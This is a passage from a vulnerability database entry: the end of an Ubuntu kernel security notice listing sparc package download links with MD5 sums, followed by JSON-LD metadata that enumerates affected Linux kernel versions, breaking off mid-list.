http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   594048 cd592a5479c6d7119a2eabe234aba28c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   169390 703d55b772601b01ef874202350a9549
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    38254 691b333634c543721644e9126fb6f22e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    38648 3c0eca639d2d669846051bc7b3acc3db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   154606 57fb00f92f0dcc365e0c41540b5efc41
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:  1993026 46125df549b3d01d4d8cc9b4356e9fb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-sparc64-smp_2.6.22-15.54_sparc.deb
  Size/MD5:   475654 c92a5bb9e70c8af93c8ba14d222d2b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-sparc64_2.6.22-15.54_sparc.deb
  Size/MD5:   474486 2c0f22707763247036f715195ea32cb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-sparc64-smp_2.6.22-15.54_sparc.deb
  Size/MD5: 12415598 f88ba6815bda87f9f6bab3b1f08f2c02
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-sparc64_2.6.22-15.54_sparc.deb
  Size/MD5: 12179794 406b603b04315995ed3b535149d11ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_sparc.deb
  Size/MD5:   684538 d20de9a13d35cd857709d8e97110d89a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   265810 e454ac8cfbb55798d897f6b8f915aaec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   159904 f25815be23aae799ff31fb30b0f660ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   247460 576ba769410c3856461f98143f89064a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:  1254066 0ae70dfca4fac5dc7187d025654c811c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   159996 f945e232f58c9a3c54ee4dc317c24005
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    91978 762357557c147272e8227fb1394886f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    40636 bc40eb4e9aaa6c4a798f93a58e4ea196
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    38574 da8bb028537d9379b91be3524de7cfdc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:     8646 ecd7b4d5a5cd5ab219902b3cf2f87227
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    60070 4adf7e7028b4fe0cef8a3f463b8c6ba4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    90990 a46723f940c9b17edd69478fba14a9ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   875908 833753a21da42ec786aaf013767c85e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:     9762 fa7c339472c4bdfda8b82021c0c45dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:   369314 55df073f08fb5e80aa5f7211d3585417
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb
  Size/MD5:    56888 eb89eaebdec3149988ab5fd1652a116c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64-smp_2.6.22-15.39_sparc.deb
  Size/MD5:  2578980 89f82b147630b1a42234d7a7f428905f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64_2.6.22-15.39_sparc.deb
  Size/MD5:  2568738 a4a1af735ea7160b6f47ef0c749689a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb
  Size/MD5:  1048456 ee8f6d236b1ab8877f7fe255c748c082
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb
  Size/MD5:   322536 7891ae3bb1a75ad4a68f895e3d8632d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb
  Size/MD5:   227024 7a30e435d568400043ce19e83390e38b
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-sparc64-smp_2.6.22.4-15.11_sparc.deb
  Size/MD5:  1002242 96e1f749c39577efa970f85dffb277a7
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-sparc64_2.6.22.4-15.11_sparc.deb
  Size/MD5:  1002138 657b9f2f3b28d2585178c447c7e7745c

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200801-0578",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6_test9_cvs"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.33.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.33.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.33.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.24_ow1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.68"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16_rc7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.23_ow2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
